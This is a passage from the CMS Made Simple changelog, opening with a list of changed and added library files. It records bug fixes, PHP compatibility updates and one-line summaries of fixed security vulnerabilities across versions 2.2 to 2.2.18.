CHANGED :: 13e05f52778771bdac11be2e4a525934 :: \uploads\simplex\teaser\mate-zimple.png
CHANGED :: 8a6d69df65cced31d7a5654cd263ac6f :: \uploads\simplex\teaser\mobile-devices-scene.png
CHANGED :: 6c9a58998f939f5dab68301f7a2966a5 :: \uploads\simplex\teaser\notebook-scene.png
CHANGED :: dbdb8453c82da641b2ac79e72267d7de :: \uploads\simplex\teaser\palm-logo.png
ADDED :: 7ad922bcc16462a101862b1b0b15182f :: \lib\phpmailer\COMMITMENT
ADDED :: 93ffca756944cd37c78d85804300ec2c :: \lib\phpmailer\Exception.php
ADDED :: 9b8f9d944f48f95f2ab0110283650747 :: \lib\phpmailer\get_oauth_token.php
ADDED :: 7941a78d274605ae2e3caf320b78a687 :: \lib\phpmailer\language\phpmailer.lang-af.php
ADDED :: b002912448dd2f25b5069daeb79bfb31 :: \lib\phpmailer\language\phpmailer.lang-ba.php
ADDED :: dcb7429587cd2a0c6f98b33f50933b5e :: \lib\phpmailer\language\phpmailer.lang-hi.php
ADDED :: 57c3d4308def6467eec54e9550316b3e :: \lib\phpmailer\language\phpmailer.lang-hy.php
ADDED :: 6c8fe8f190a0ccc9f750851ba0d65585 :: \lib\phpmailer\language\phpmailer.lang-mg.php
ADDED :: 563da4ca11458562b6e938bc7742248a :: \lib\phpmailer\language\phpmailer.lang-rs.php
ADDED :: 8499f7e63ecd9855d165afe10b4b64a3 :: \lib\phpmailer\language\phpmailer.lang-sr_latn.php
ADDED :: ea1ce8d9353133c43fb3f14ad663454b :: \lib\phpmailer\language\phpmailer.lang-tl.php
ADDED :: 357b73808f398adf478071fbf0461945 :: \lib\phpmailer\OAuth.php
ADDED :: ee90fa47540f4f9c07527b1a5bb0f528 :: \lib\phpmailer\OAuthTokenProvider.php
ADDED :: 067dc3f9ae23cd54bfd6a26b9260592a :: \lib\phpmailer\PHPMailer.php
ADDED :: a89646ce63e0b8759fde75fb588473e8 :: \lib\phpmailer\POP3.php
ADDED :: e7d414af165d9da903947ea220f6d515 :: \lib\phpmailer\SMTP.php
ADDED :: 1f5b0db85804a5a633cf55b7a73f8bf9 :: \lib\smarty\plugins\modifier.explode.php
ADDED :: d0c99e948a6335034a8291d3aeca1de3 :: \lib\smarty\plugins\modifier.mb_wordwrap.php
ADDED :: 95a3c89b7c62b71cda5fb15c35086366 :: \lib\smarty\plugins\modifier.number_format.php
ADDED :: 4b0b96bc7adee7474d76c439c30d11a4 :: \lib\smarty\sysplugins\smarty_internal_compile_child.php
ADDED :: f1f9cb2ac3e519a4e793dca7805821b4 :: \lib\smarty\sysplugins\smarty_internal_compile_parent.php
ADDED :: b531511cc0a09d936b0ee0f901385d7c :: \lib\smarty\sysplugins\smarty_internal_errorhandler.php
ADDED :: 014ec5a83423371db4d4be7afe2889be :: \lib\smarty\sysplugins\smarty_internal_method_literals.php
Version 2.2.18 - Apex
-------------------------------
Core - General
- Fallback function CMSMS\strftime. PHP Intl extension still recommended. The fallback solves issues on hosts that don't install it by default and don't allow users to install it. 


Version 2.2.17 - Iqaluit
-------------------------------
Core - General
 - BR #12529 - Cacheable Pages have Bad Header Last-Modified;
 - BR #12543 - Lib file corrections;
 - BR #12618 - HasChildren() is broken;
 - BR #12587 - can't uninstall modules;
 - Compatibility fixes for PHP 7, 8.0 and 8.1;
 - Smarty upgraded to version 4.2.1;
    Note: Smarty 2 syntax is still supported, but deprecated
 - Add function CMSMS\strftime to replace deprecated PHP function. PHP Intl extension recommended to support this.
 - Enabled use of PHP functions trim,ltrim,rtrim in smarty templates
 - PHPMailer upgraded to version 6.6.0.
 - fixes BR #12529 Cacheable Pages have Bad Header Last-Modified;
 - added module's support for arrays in parameters;
 - Fixes to cms_mailer class mainly in terms of proxy design pattern getters and setters and autotls settings;
 - Smarty security policies changes: due to some modifications in the way updated Smarty now behaves, all static classes need to be registered for its use to be allowed in templates.

Content Manager 1.1.10
 - Differentiate new page from cloned page.
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

Design Manager 1.1.10
 - BR #12545 - Module: DesignManager typo info on top file.
 - fixes typo BR #12545
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

FilePicker 1.0.6
 - BR #12539 - Module FilePicker 1.0.5 files corrections.
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

Module Manager 2.1.9
 - BR #12541 - Module ModuleManager 2.1.8 : corrections + compatible php 7.1.0 to 8.1.4.

News 2.51.12
 - BR #12543 - Lib file corrections.
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

FileManager 1.6.13
- Compatibility fixes for PHP 7, 8.0 and 8.1.


Version 2.2.16 - Truro
-------------------------------
Core - General
  - BR #12370 - Admin Log-Download : now downloading the log honors all filters but doesn't process paging.
  - BR #12437 - Installer won't allow "<" symbol in database password.
  - BR #12457 - Event Manager empty list when mysql mode only_full_group_by.
  - BR #12484 - Cannot exit after Run UDT.
  - BR #12495 - MySQL 8.0.2+ breaks groups without table prefix.
  - BR #12499 - adminlog.tpl Wrongly formed date.
  - BR #12500 - NameQuote function does not work properly.
  - BR #12504 - Function call notification.
  - Fixed an issue with specific characters in a content block tab name breaking the editor.
  - Adjust regex's incompatible with PCRE2.
  - Avoid deprecated strftime() - deploy new replacement function locale_ftime() and new modifier-plugin localedate_format.
  - A number of fixes for PHP 8 compatibility.

Admin Search v1.0.6
  - BR #12443 - Admin Search fails on some searches with default mysql mode only_full_group_by (mysql 5.7.5+).
  - Removed license and copyright notices from module help text.
  - Escaping the search input field values.
  - More content object attributes are searched.
  - User Defined Tags can be searched.
  - Only places a user has permission to search are shown in the filter list (cached!).

Content Manager v1.1.9
  - Fix menu text/title setting.

FileManager v1.6.12
  - BR #12435 - Replacing an image file in filepicker doesn't update thumbnail.

FilePicker v1.0.5
  - FR #12483 - Additional FilePicker Help for usage as Content Block.

Navigator v1.0.9
  - BR #12456 - Navigator breadcrumbs with default page hidden from menu causes PHP notice.

Search v1.53
  - Added 'Manage Search' permission.
  - BR #12391 - Core search issue page/entry titles that start with numbers.
  
Phar Installer v1.3.15
  - Fixed BR #12437 - Installer won't allow "<" symbol in database password.
  - Added Russian lang file to installer.
  - use locale_ftime() instead of deprecated strftime().
  - escape name of groups table, to prevent reserved-word conflict when table-prefix is empty.
  - alterations to the links in final step: we now privilege links to CMSMS channels of contact and support.


Version 2.2.15 - Bonaventure
-------------------------------
Core - General
  - BR #12287 - Admin shortcuts popup refers to IRC.
  - BR #12292 - showbase parameter of metadata tag doesn't accept boolean value.
  - BR #12303 - No date displayed in the admin + category id not incremented.
  - BR #12305 - Removing actual Destination Page breaks Destination Page dropdown in Internal Page Link pages.
  - BR #12311 - log_performance_info - undefined variable: queries.
  - BR #12313 - 5 Stored XSS vulnerabilities in Settings - Content Manager.
  - BR #12317 - XSS on Settings News Module.
  - BR #12325 - Several XSS vulnerabilities.
  - BR #12335 - User pref admin homepage not properly displayed under certain conditions.
  - BR #12337 - GetContentBlockFieldInput $adding always false.
  - BR #12338 - Allow http/2 responses.
  - BR #12357 - Filepicker dropzone size issue.
  - FR #12345 - More user friendly admin session handling (partly implemented).
  - FR #12349 - Swap tabs on System Maintenance page.
  - Browsing to the main admin page in a new browser tab during a running session won't redirect to login form anymore.
  - (Error) messages in OneEleven won't dismiss on click.
  - Fix to Admin redirection after login on Windows platform.
  - Fix to the module API redirection to support arrays in parameters.

FileManager v1.6.12
  - Dropzone improvement like core FilePicker.

FilePicker v1.0.5
  - BR #11673 - FilePicker will not show svg images, when in the Content Manager.
  - BR #12312 - Stored XSS vulnerability in File Picker.

News v2.51.11
  - Minor code fix to encoding title content.
  - BR #12322 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - BR #12325 - Several XSS vulnerabilities.

Design Manager v1.1.9
  - Minor fixes for PHP warnings\notices.

Module Manager v2.1.8
  - BR #12291 - Reflected Cross site scripting.
  - BR #12324 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - Increased the Download Chunk Size field size to 4.

MicroTiny v2.2.5
  - BR #12351 - Escaping translation strings in tinymce_config.js.

Search v1.52
  - FR #11886 - Include module and modulerecord fields for content pages.

Phar Installer v1.3.13
  - Fixes to the reload button: now prevents browser's caching.
  - BR #11591 - fixed: Phar installer doesn't work with OPCache enabled.


Version 2.2.14 - T'Sou-ke
-------------------------------
Core - General
  - BR #12280 - Add Shortcut from Shortcuts modal broken.
  - Fixes to the class.CmsAdminThemeBase.php regarding main sections title and breadcrumbs generation.
  - Explicitly add function_exists and getimagesize functions to the allowed functions in PHP secure mode.
  - Improved Error Console template.
  - Site Prefs, remove submit confirmation.
  - System Maintenance, remove confirmation update page hierarchy positions and routes.
  - cms_http_request PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".
  - Backend users, fixed the bulk actions.
  - BR #12172 - CronJobTrait undefined constants.
  - BR #12227 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - BR #12272 - Internal page link - selecting destination page problem.

AdminSearch v1.0.5
  - Remove click thru warning.

CMSContentManager v1.1.9
  - Fix notices in edit content template.
  - Fix notice in default admin view.

DesignManager v1.1.8
  - BR #12225 - Reflected Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

FileManager v1.6.11
  - Don’t disable advanced mode on upgrade.
  - Fix adding double // in site root link.
  - BR #12215 - FileManager 1.6.10 crashes when trying to rename a file.
  - BR #12224 - Reflected Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

News v2.51.9
  - Minor code fix.
  - Alert on unapproved articles disabled by default. Enable at Settings >> Options tab.
  - BR #12207 - Can't display image in news when using upload field.
  - BR #12228 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

Phar Installer v1.3.9
  - PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".
  - PHP 7.4 fix "Function get_magic_quotes_runtime() is deprecated".

Search v1.51.8
  - PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".


Version 2.2.13 - Moosomin
-------------------------------
Core - General
   - Explicitly add a function or two to the allowed functions in PHP secure mode.

DesignManager v1.1.7
   - Fix a warning in PHP 7.3+.

FileManager v1.6.10
   - Fix minor XSS vulnerabilities in FileManager.

News v2.51.8
   - Fix a security issue in the default action with the idlist param.
   (This version was also separately released in the forge).


Version 2.2.12 - Osoyoos
-------------------------------
NOTICE: Due to the nature of the security issue fixed in FileManager after upgrading you should change your database password.

Core - General
  - Fix warning in cms_html_entity_decode.

FileManager v1.6.9.1
  - Security fixes for view action.


Version 2.2.11 - Vulcan
-------------------------------
Core - General
  - Fix minor bug in copying content objects.
  - Minor fix to array indexes when filling params in ContentBase.
  - Fix to the {cms_filepicker} plugin.
  - Minor fix to the 'my account' form.
  - Fix error in cmsms_filepicker.js encountered in LISE.
  - PHP 7.3 fix to DataDictionary::RenameColumnSQL.

CMSContentManager v1.1.8
  - Fix an issue with copying non-core content objects.
  - Minor fixes for php 7.3.

ModuleManager v2.1.7
  - Minor exception handling improvements.
  - Minor improvement to dependency detection with modules that do not exist in ModuleRepository.
  - Minor fixes for php 7.3.

News v2.51.6
  - Minor improvements for CMSMS v2.3 compatibility.

Phar Installer v1.3.8
  - Minor change to use include() instead of include_once()... not sure why.

FilePicker v1.0.4.1
  - Fix type error.

Search v1.51.7
  - Minor fixes for php 7.3.


Version 2.2.10 - Spuzzum
-------------------------------
Core - General
  - Fix minor potential authenticated object insertion vulnerability in changegroupperm.
  - Fix minor potential uncleaned input vulnerability in siteprefs.
  - Minor improvement to get_real_ip().
  - Fix to clearing cache in cms_filecache_driver.

News v2.51.5
  - Fix unauthenticated SQL injection vulnerability with the default action.

ModuleManager v2.1.6
  - Fix authenticated object insertion vulnerability in the installmodule action.
  - Improve ordering of the dependencies before installing or upgrading modules.
  - Adds more auditing, particularly in the cached request stuff.

FilePicker v1.0.4
  - Fix authenticated object insertion vulnerability.


Version 2.2.9.1
-------------------------------
Core - General
  - fix to the CmsLayoutStylesheetQuery class.
  - fix an edge case in the Database\Connection::DbTimeStamp() method.

MicroTiny v2.2.4
  - Minor fix in error displays.

Phar Installer v1.3.7
  - Fix to edge case in step 3 where memory_limit is set to -1.


Version 2.2.9 - Blow Me Down
-------------------------------
Core - General
  - PHP 7.2+ fixes.
  - Now do not call Module::InitializeAdmin() or Module::InitializeFrontend() if the module loading is being forced
    (as is the case sometimes within ModuleManager);
  - Minor changes and fixes to prevent warnings/notices in CLI based scripts.
  - Improvements to the {browser_lang} plugin.
  - Fixes a bug in the CmsLayoutTemplateQuery class.
  - Fixes a bug with the name= parameter in the {cms_stylesheet} plugin.
  - Fixes a minor issue in system information (smarty compilecheck).
  - Fixes a minor issue with the tabIndex and accesskey fields in edit content.
  - Fixes issue in the CmsLayoutStylesheet class related to associating designs with new stylesheets.
  - Now check for an english language file first in module_custom/xxxxx/lang before a file for the current language.
  - Prevent false-positive hit for "multiple_webshells_0018" rule webserver virusscanner (https://github.com/Yara-Rules/rules/blob/master/Webshells/WShell_THOR_Webshells.yar#L4764).
  - Fixes a bug in ContentOperations::LoadAllContent() if the content list had a custom content type from a module that was unvavailable.
  - Fixes a bug in the Database\Connection::DbTimeStamp().

Search v1.51.6
  - Minor fixes to help.

MicroTiny v2.2.3
  - More entropy in the mt_config.js filename to fix issues with js caching when switching users.
  - Fixes in the cms_linker plugin for when trying to change a link to a CMSMS page where the alias has changed.

FileManager v1.6.8
  - Fixes an upload issue.

ModuleManager v2.1.5
  - PHP 7.2+ fixes.

CMSContentManager v1.1.7
  - Fixes an issue with changing content type after copying a content page.

DesignManager v1.1.5
  - Fixes ownership issue on templates with importing a design.

Phar Installer v1.3.7
  - Minof fix to detect when PHP's memory limit is set to -1.


Version 2.2.8 - Flin Flon
----------------------------------
Core - General
  - Re-introduce the host_whitelist config entry that got lost in some commit somewhere.
  - Minor fix to pagination in Admin log.
  - Change Finnish locale priorities so that UTF-8 is first.
  - Minor fix to calling hooks with a single associative array parameter.
  - Adds new HookManager::do_hook_first_result() method.
  - cangegroupperms now calls HookManager::do_hook_first_result.
  - Minor enhancement to moduleoperations::_load_module() to check if the class exists.
  - Minor enhancement to {cms_action_url} wrt. the page to link to if not specified.
  - Deprecate CMSModule::SetParameterType and CMSModule::CreateParameter methods.
  - Deprecate ModuleOperations::GetModuleParameters() method.
  - CMSModule::RestrictUnknownParameters() now does nothing.
  - No longer warn if a module is sent a parameter that is not registered.
  Note: modules should now be cleaning parameters directly (see filter_var) from $_POST and $_REQUEST ($_GET is automatically cleaned).
  Note: In the future,  $params in module actions will only consist of parameters passed on the module tag.
  - PHP 7.2+ fixes.
  - Fix the inactive param in the page_attr plugin.

FilePicker v1.0.3
  - Minor fix to delete action.

Search v1.51.5
  - Now enforce utf-8 on preg_split.
  - Minor parameter check.
  - Removed deprecated each() function.

CMSJobManager v0.1.3
  - Notices fixed.
  - PHP 7.2+ fixes.

FileManager v1.6.7
  - Remove un-necessary files that may cause a security vulnerability.
  - prevent creating directories with leading or trailing whitespace in the name.

Module Manager v2.1.4
  - PHP 7.2+ fixes.

Navigator v1.0.9
  - Template fix simple_navigation.tpl. Output correct class for parent without active children.

News v2.51.4
  - Notices fixed.


Version 2.2.7 - Skookumchuck
----------------------------------
Core - General
  - Change internal CSRF variable name.
  - Fix object insertion bug via deserialize in LoginOperations.
  - Fix issue where login cookie contents could be forged by determining the hashing salt.
  - Refactor the mechanism for generating and verifying admin account password reset codes.

FileManager v1.6.6
  - No longer allow uploading files with names that end in .

FilePicker v1.0.2
  - No longer allow uploading files with names that end in .

Search v1.51.4
  - Minor fix to microtime calls.


Version 2.2.6 - Come by Chance
----------------------------------
Core - General
  - Fixes to AdminAlerts::load_by_name().
  - SetMessage() and SetError() in the module API now use session variables.
  - Remove support for module_error and module_action request parameters in admin module actions.
  - Add call to check_login() in admin actions that were missing them.

Search v1.51.3
  - Fix notice in PHP 7.1: A non well formed numeric value encountered...


Version 2.2.5 - Wawa
----------------------------------
Core - General
  - Fix minor security issue in the way login information was cached in cookies and the session.
  - Simplify rules around alias editing/generation in fillparams.
    If the alias field exists then we can adjust its value or recalculate an alias.
    Use basic properties, and ownership and permissions to determine if that field exists on the edit form.
  - Minor fixes to the CmsJobManager.


Version 2.2.4 - Little Paradise
----------------------------------
Core - General
  - Improvements to the Hook class.
  - Minor fix to usertagoperations.
  - Changes to the hierarchy selector to disallow circular references.
  - Fix problems with additional editors causing page aliases to be regenerated.
  - Minor fixes to Admin log browser.
  - Minor fixes to Admin login.
  - Add missing call Core::LoginPre hook.
  - Modify myaccount.php to call Core::EditUserPre hook BEFORE the password is set.
  - Fix documentation to CallUserTag.
  - Fix to default handling for content_image block.
  - Improve the help for the {page_attr} plugin.
  - Fix a potential warning in the {anchor} tag.
  - Fix boolean comparison in LoginOperations.

Installation Assistant v1.3.4
  - Fixes endless recursion issue with setting a tmpdir.
  - Fix issue with requiring a database prefix on upgrade.

FilePicker v1.0.2
  - Now allow specifying a 'useprefix' boolean parameter to the action url which will use the current top directory.
  - Add a prefix on all returned strings.
  - Slight modification to the profile class.
  - Now sends the FileManager::OnFileUploaded hook the same way as FileManager does.
  - Adds an exception handler around the change working directory stuff.

FileManager v1.6.5
  - Change upload action to call FileManager::OnFileUploaded hook before creating the thumbnail to allow a hook to rename the uploaded file.
  - Now enable creation of thumbnails on install.

MicroTiny v2.2.2
  - Minor fix for the filepicker if using a default filepicker profile that specifies a top directory.
  - Re-adds the table plugin (went missing when we upgraded tinymce).

ModuleManager v2.1.3
  - Adds audit line displaying status if cannot connect to ModuleRepository.

DesignManager v1.1.4
  - Fixes problems with the cancel button not marking the form as 'clean' (not dirty).


Version 2.2.3.1 - Happy Adventure
----------------------------------
Core - General
  - Fix an issue when parsing multiple content blocks.


Version 2.2.3 - Happy Adventure
----------------------------------
Core - General
  - Fixed a redirect loop problem on mixed HTTP/HTTPS sites when the secure flag was set on some pages.
  - Fixed a problem with prefilters and postfilters not working if placed in /assets/plugins.
  - Now use our own derivative of Smarty Internal Template so that we can send hooks, etc.
  - Improved error message if there was an error parsing the template (or a duplicate content block).
  - Fixes content blocks, image blocks, module blocks containing whitespace in the name.
  - Minor fix to {cms_filepicker} plugin.
  - Improve the CmsModuleInfo class such that if the module class file is newer it will be loaded.
  - Now generate the moduleinfo.ini file automatically on install or upgrade of a module.
  - Increase the maxlength attribute for password input boxes in myaccount.
  - Adds a StartsWith JavaScript shiv for IE11.
  - Revert the protocol-less URI for root_url (more changes coming for 2.3).
  - Get rid of the smart_url config option.
  - Fix a problem when testing for duplicate aliases of the form string-###  where the suffix integer was greater than 100.
  - More fixes to mact preprocessing if {content} was in the top of the template.
  - Minor fix to ExpandXMLPackage to not throw an exception in brief mode if module is not compatible with the current version of CMSMS.
  - adds new cms_entities_array function in misc to convert an array recursively to values.
  - Fixes transposed arguments in UserOperations::AddMemberGroup().
  - Better detection of duplicate content blocks.
  - Revert template_stack change to Smarty_CMS from 2.2.2.
  - Improvements to HookManager.

CmsJobManager v0.1.1
  - Optimization of audit logging.
  - Change connection timeout to 1 second.
  - Change processing to be a little more friendly to some environments wrt. content-size header.
  - Prevent processing from the CLI when root_url is calculated.

MicroTiny v2.2.1
  - Minor fix for filepicker plugin.

News v2.51.3
  - For security, no longer urldecode the detailtemplate parameter in detail view.
    This may have some implications for people that are specifying the detailtemplate parameter (with a template with special characters) from within a WYSIWYG (which is not recommended behavior).
  - Convert title and dropdown options and text fields to entities before display.

ModuleManager v2.1.2
  - Now sort modules in the installed tab a bit better.
  - Now handle module 'not available' a bit better.

FileManager v1.6.4
  - Add a different icon for navigating up one level.
  - No longer allow uploading any php (or derivative) file.
  - No longer allow renaming any file to have a .php extension (or a derivative).
  - Fixes an issue when improper/invalid values for root path and uploads path are manually specified in the config.php

FilePicker v1.0.1
  - No longer allow overriding the filepicker type on the URL.
  - No longer allow uploading any .php files.

CMSContentmanager v1.1.6
  - Now double check that the 'default parent' for new pages actually exists.

Navigator v1.0.8
  - Minor english documentation correction.

Installation Assistant v1.3.3
  - Now look for lib/include.php before include.php in step 8 and step 9 when connecting to CMSMS.
  - Fixes to upgrade routine for 2.1.5 wrt. the 'Manage Stylesheets' permission (ignore an exception).


Version 2.2.2 - Hearts Content
----------------------------------
Core - General
 - Additional security improvement in CMSModule::GetTemplateResource().
 - Now Smarty_CMS is no longer derived from SmartyBC (uses our own wrapper class) which prevents all occurrences of {php} tags from running.
 - Adds an admin directory .htaccess file to explicitly disable browser caching of any resources.
 - Fixes a relative path vulnerability in module_file_tpl resource.
 - Fixes a path building issue in CmsModuleInfo.
 - Fixes to parsing and generating moduleinfo.ini files.
 - Disallow any resource specifications with a * or a /.
     * This also means that no file resource specifications with path information will be permitted.
 - Move mact preprocessing to AFTER the template_top has been processed. So order of processing (for module actions on the frontend is)
     a:  template top
     b:  mact preprocessing (if enabled, which is the default)
     c:  template body
     d:  template head
 - Fix sureGetNodeByAlias to check if the input is numeric. If it is, assume that it is a page id, not an alias.
 - Fix alias generation in the ContentBase class to check if the input page title is numeric... If it is, prepend a character to it to ensure that integer casting will return 0.
 - Fix listtags to show tags using smarty_nocache_ function name prefix.
 - Improvements to the {form_start} plugin.
 - Fix silly, old issue in recursive_delete function.
 - Clean up more parameters from the content tag before passing to module action.
 - Fix local file inclusion vulnerability in listtags.
 - Now call get_userid() in debug_to_log instead of check_login()

AdminSearch v1.0.3
 - Now search the metadata field of content pages.
 - Fixes for single quotes in search results.

DesignManager v1.1.3
 - Set title attribute tags for edit/create template, stylesheet, design.
 - Remove debug statements.

MicroTiny v2.2
 - Upgrade tinymce to v4.6.x.
 - Adds new tabfocus and hr plugins.

News v2.51.2
 - Fixes so that all cancel buttons work properly on new News articles.

Navigator v1.0.7
 - Adds a silly __get() method to the NavigatorNode class squash some notifications in the error logs.

ModuleManager v2.1.1
 - Now handlle remote module installs upgrades, and activates via a 2 request process to allow new module versions to be read into memory.

Installation Assistant v1.3.2
 - Correction to assets warning

Search v1.51.2
 - Now do an html entity decode on all content added to AddWords.


Version 2.2.1 - Hearts Desire
----------------------------------
Core - General
 - Improve the Smarty plugin loading to handle non-cachable plugins in the /assets/plugins and /plugins directories.
 - Fixes to transaction functions in database abstraction library.
 - Fix CMSModule::GetTemplateResource to no longer accept eval or string resources.
 - Fix CMSSmartySecurityPolicy so that debug_to_log is no longer an allowed function.

   Many thanks to Daniel Le Gall from SCRT SA, Switzerland for reporting the vulnerabilities.

Installation Assistant v1.3.1
 - On upgrade to 2.2.1 move all files from /plugins to /assets/plugins (they should only be third party plugins at this point).
 - On upgrade chmod the config.php to 444.

MicroTiny v2.1.1
 - Fix temporary JS call URL.

News v2.51.1
 - Fix frontend pagination.


Version 2.2 - Canada
----------------------------------
Core - General
  - Automatically turn on file locking for cached files to attempt to mitigate race conditions.
    NOTE:  On systems using archaic filesystems such as FAT and FAT32 CMSMS may no longer operate.
  - cms_filecache_driver now caches for 2 hours by default and has an improved cooperative locking test
  - Implement new database abstraction library that is compatible with (functionality wise) but improves upon adodb-lite.
  - Implement protocol-less URL's in the config.
  - Page tabs are now focusable (you can tab through page tabs and use enter to select one).
  - Minor fix to the {form_start} plugin.
  - Minor change to the {admin_icon} plugin (default image class).
  - Cache more items that are queried from the database, to reduce mysql load.
  - Minor change to tree operations functionality to reduce memory usage.
  - Fixed problem with order of content blocks when using {content_module} stuff.
  - Adds get_usage_string and the concept of a type assistant to template types.
  - Minor change to auto-alias determination routine.
  - Detect module_custom enhancements in the CmsModuleInfo stuff.
  - Refactor Admin authentication.
  - More fixes to the cms_url class.
  - Optimize the include.php file.
  - Adds built-in asynchronous task processing system.
  - Adds the ability to reduce redundant mentions in the Admin log (runs asynchronously).
  - Refactor the Admin log page to allow for better filtering and pagination.
  - Admin log now uses cms_date_format and cleans output.
  - Notification functions in the CmsAdminThemeBase function are now just stubs and do nothing. Will be removed at a later date.
  - Removed the GetNotificationOutput() method from the module API.
  - Adds classes for creating Alerts. This is much more advanced than the old Notifications system.
  - Minor accessibility tweaks to the OneEleven theme.
  - Fix numerous minor problems with the OneEleven theme.
  - Refactored the OneEleven Admin theme to use new Alerts classes instead of old Notifications.
  - Refactor the OneEleven Admin theme to display an alert icon in the shortcut bar, instead of in the navigation area.
  - Fixed sidenav in the one OneEleven theme now works properly. If sidenav is larger than viewport then don't use fixed... easy.
  - In OneEleven Now revert to small sidebar navigation (still floating) if screen is too narrow.
  - Removed notification settings from MyAccount and Global Settings.
  - Removed pseudocron granularity preferences.
  - cms_alert() and the new cms_confirm() JavaScript functions now return promises.
  - Revises much code to use cms_alert and cms_confirm() instead of the standard, but browser specific functions.
  - Fixes to the cache clearing methodology.
  - No longer check for duplicate content blocks in templates... NEEDS TESTING
  - New core events: ContentPreRender, LostPassword, LostPasswordReset, StylesheetPostRender.
  - Fix problem with the default parameter to the {content} tag.
  - Fix problem with the use_smartycache thing in system information.
  - Fix notice in useroperations.
  - Fixes problems where all files (including dot files) had to be writable before creating a module XML file.
  - Fixes minor notice in user operations.
  - Fixes for namespaced modules.
  - Fixes an issue in CmsLayoutTemplate when creating a template from a type.
  - Fixes an issue where a 404 handler error page would not be rendered correctly if for some reason the route did not specify a page id to load.
  - More fixes to cms_url class.
  - Numerous minor optimizations.
  - Add to content types the ability to set basic attributes for properties from within the page type definition.
  - Fixes problems with pagelink and link content types not being properly editable by additional editors.
  - Adds more type and content cleaning into the content types FillParams method(s).
  - Pass an explicit cacheid in to createtemplate in index.php.
  - Fix an error message in the autorefresh JavaScript class.
  - Fix problems that could result in uid=1 becoming inactive, and not a member of other groups when edited by another user.
  - Fix query problem in CmsLayoutStylesheetQuery with Mysql 5.7.
  - The {content} tag now supports passing data attributes to the generated textarea, for use by syntax highlighter and WYSIWYG modules. i.e: {content data-foo="bar"}.
  - Refactoring of the Admin login code to be cleaner, more efficient, more secure.
  - No longer allow any modules to auto-upgrade on frontend requests.
  - Fix problem with cms_filecache_driver::clear().
  - Introduces the new Hook mechanism to allow optimizing cms_stylesheet a bit further. All core SendEvent calls are now implemented as hooks.
  - changegroupperms can now localize permission names,  and add an info string for each permission. (the listpermissions hook).
  - Adds add_headtext(), get_headtext(),  add_footertext(), get_footertext() methods to the Admin theme class.
  - minor refactoring of admin/index.php, admin/header.php, admin/footer.php and admin/moduleinterface.php.
  - now use hooks so that loaded modules can now add text to the head area of any Admin page output.
  - Change the help for the basic attributes.
  - Adds new 'switch user' functionality for members of the Admin group.
  - Re-factor the content page selector ... now supports two modes (one for a simple list, and the previous dynamic one that is faster for large sites)
    the simple list mode is used for users with limited edit capabilities on pages.
  - Adds a new Smarty plugin {page_selector} to the Admin lib.
  - New arguments to the CreateHierarchyDropdown function (deprecated) and adjust documentation.
  - Content pages now have the ability to control whether or not the page wants any more children.
  - The TemplateType class now has a help callback to optionally allow retrieving help for templates of a particular type.
  - Permissions are now grouped logically by module/originator in ChangeGroupPermissions.
  - Now use HTTPS for the latest version check.
  - Adds the public_cache_url config entry,  and make sure that the css_url uses that by default.
  - Adds many core hooks.
  - Enhance the {page_image} plugin to optionally output a full HTML img tag if there is a value for the respective property.
  - Improve the {content_image} plugin to output nothing if there is no value for the property, and to output any non-internal arguments as attributes to the HTML img tag.
  - Upgrade to an un-modified version of smarty v3.1.31.
  - Move plugins directory to lib/plugins since we now have the assets/plugins directory for custom plugins.  Upgrading should preserve any custom plugins in the /plugins directory.
  - Add new plugins {thumbnail_url}, {file_url} and {cms_filepicker).
  - Add more intelligence to the tableoption handling for DataDictionary::CreateTableSQL.
  - Minor improvements to the asynchronous behaviour of the locking functionality.
  - #11295 - Cannot change the name of a UDT, always creates new UDT.
  - #11080 - Parameter $adding in GetContentBlockFieldInput always FALSE.
  - #11093 - Bad error message in jquery.cmsms_autorefresh.js.
  - #11133 - is_email() fails on domain check.
  - #11235 - munge_string_to_url leaves trailing dashes at the end of munged URL.
  - #11287 - Password reset form's password fields have different lengths.
  - Fix issue with module actions if 'content_en' block name was given on the default content block.
  - Better security when saving content pages.  Most primary fields are cast to their appropriate data type (int, bool, etc).  MenuText, and TitleAttribute can no longer contain html tags like <strong>foo</strong>.
  - Fixes issue with entities in redirecting links
  - The href/page argument to {cms_selflink} is now decoded before resolving to a page id.

Navigator v1.0.5
  - Minor optimizations.
  - Now use pageid in calculations of cacheid.
  - Now output template help to Navigator.

Installation Assistant v1.3
  - Only create dummy index.html files in subdirectories we created.
  - Clear cache after step 9.
  - Upgrade routine now asks for, and tests database credentials.
  - Upgrade routine now rewrites the config.php file (but keeps a backup).
  - Set a few more preferences to reasonable defaults on install. Specifically related to site cleanup and performance.
  - On installation, now insure that tmp/cache and tmp/templates_c directories are empty.
  - Now displays if files are going to be skipped.
  - Adds clear option for development purposes.
  - No longer ask to save database password.
  - On install now create the assets directory structure.
  - On upgrade (for 2.2) now create the assets directory structure and move tmp/configs, tmp/templates, module_custom, admin/custom, etc. within it.
  - When using the expanded installer allow changing the destination directory on step 1.
  - Check for existing files in the installation directory for new installations.
  - Added more notes to aide in diagnosing white screens
  - Modify package .zip files so that extracted files will usually have 644 permission (depends on the unzip routine used).

CmsJobManager
  - New core module to handle queued asynchronous tasks.

Content Manager
  - Minor tweak to bulk delete pages.
  - Minor fix to the active tab when changing a template or design.
  - Now listen to the 'default parent page' user preference.
  - Fix minor XSS problem in the Admin if some loser puts JavaScript into the title field or alias field or menu text field.
  - Now allow filtering pages by owner, editor, template, or design.  Only for Administrators with Modify any page, or Manage all content permissions.
  - Fix problems with auto-refresh being too fast for some operations.
  - Now auto scroll to the first matched page in a find.
  - Additional editors of a page cannot change the content type. Only owners, or users with the Manage all Content permissions.
  - Fix a problem with the call to GetTabElements.

DesignManager
